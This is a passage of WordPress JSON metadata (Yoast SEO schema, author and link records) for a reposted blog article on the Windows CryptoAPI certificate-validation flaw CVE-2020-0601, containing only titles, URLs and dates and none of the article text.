2\"},\"image\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/d14d2d3cd77ffdb618b9f1330fe084db\",\"name\":\"version2hk\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g\",\"caption\":\"version2hk\"},\"sameAs\":[\"http:\\\/\\\/version2xfortcom.wordpress.com\"],\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/author\\\/version2hk\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Windows CryptoAPI Spoofing - Certificate Incorrect Validation - CVE-2020-0601 - Version 2","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.vicarius.io\/blog\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601","og_locale":"zh_HK","og_type":"article","og_title":"Windows CryptoAPI Spoofing - Certificate Incorrect Validation - CVE-2020-0601 - Version 2","og_description":"Vulnerability Details: A spoofing vulnerability exists [&hellip;]","og_url":"https:\/\/www.vicarius.io\/blog\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601","og_site_name":"Version 2","article_published_time":"2022-10-29T08:22:44+00:00","article_modified_time":"2023-07-24T10:44:16+00:00","og_image":[{"url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u1m81hfr9q0llg6940djn3.jpg?tr=w-1800,c-at_max","type":"","width":"","height":""}],"author":"version2hk","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"version2hk","\u9810\u8a08\u95b1\u8b80\u6642\u9593":"7 \u5206\u9418"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.vicarius.io\/blog\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601#article","isPartOf":{"@id":"https:\/\/version-2.com\/2022\/10\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601\/"},"author":{"name":"version2hk","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/d14d2d3cd77ffdb618b9f1330fe084db"},"headline":"Windows CryptoAPI Spoofing &#8211; Certificate Incorrect Validation &#8211; CVE-2020-0601","datePublished":"2022-10-29T08:22:44+00:00","dateModified":"2023-07-24T10:44:16+00:00","mainEntityOfPage":{"@id":"https:\/\/version-2.com\/2022\/10\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601\/"},"wordCount":544,"publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u1m81hfr9q0llg6940djn3.jpg?tr=w-1800,c-at_max","keywords":["vRx","2022"],"articleSection":["vRx","2022","Press Release"],"inLanguage":"zh-HK"},{"@type":"WebPage","@id":"https:\/\/version-2.com\/2022\/10\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601\/","url":"https:\/\/www.vicarius.io\/blog\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601","name":"Windows CryptoAPI Spoofing - Certificate Incorrect Validation - CVE-2020-0601 - Version 2","isPartOf":{"@id":"https:\/\/version-2.com\/zh\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.vicarius.io\/blog\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601#primaryimage"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u1m81hfr9q0llg6940djn3.jpg?tr=w-1800,c-at_max","datePublished":"2022-10-29T08:22:44+00:00","dateModified":"2023-07-24T10:44:16+00:00","breadcrumb":{"@id":"https:\/\/www.vicarius.io\/blog\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601#breadcrumb"},"inLanguage":"zh-HK","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.vicarius.io\/blog\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601"]}]},{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/www.vicarius.io\/blog\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601#primaryimage","url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u1m81hfr9q0llg6940djn3.jpg?tr=w-1800,c-at_max","contentUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u1m81hfr9q0llg6940djn3.jpg?tr=w-1800,c-at_max"},{"@type":"BreadcrumbList","@id":"https:\/\/www.vicarius.io\/blog\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9801","item":"https:\/\/version-2.com\/zh\/"},{"@type":"ListItem","position":2,"name":"Windows CryptoAPI Spoofing &#8211; Certificate Incorrect Validation &#8211; CVE-2020-0601"}]},{"@type":"WebSite","@id":"https:\/\/version-2.com\/zh\/#website","url":"https:\/\/version-2.com\/zh\/","name":"Version 2","description":"","publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/version-2.com\/zh\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-HK"},{"@type":"Organization","@id":"https:\/\/version-2.com\/zh\/#organization","name":"Version 2","url":"https:\/\/version-2.com\/zh\/","logo":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","contentUrl":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","width":1795,"height":335,"caption":"Version 2"},"image":{"@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/d14d2d3cd77ffdb618b9f1330fe084db","name":"version2hk","image":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/secure.gravatar.com\/avatar\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g","caption":"version2hk"},"sameAs":["http:\/\/version2xfortcom.wordpress.com"],"url":"https:\/\/version-2.com\/zh\/author\/version2hk\/"}]}},"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pbQRKm-fro","post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/59358","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/users\/143524195"}],"replies":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/comments?post=59358"}],"version-history":[{"count":7,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/59358\/revisions"}],"predecessor-version":[{"id":69487,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/59358\/revisions\/69487"}],"wp:attachment":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/media?parent=59358"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/categories?post=59358"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/tags?post=59358"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}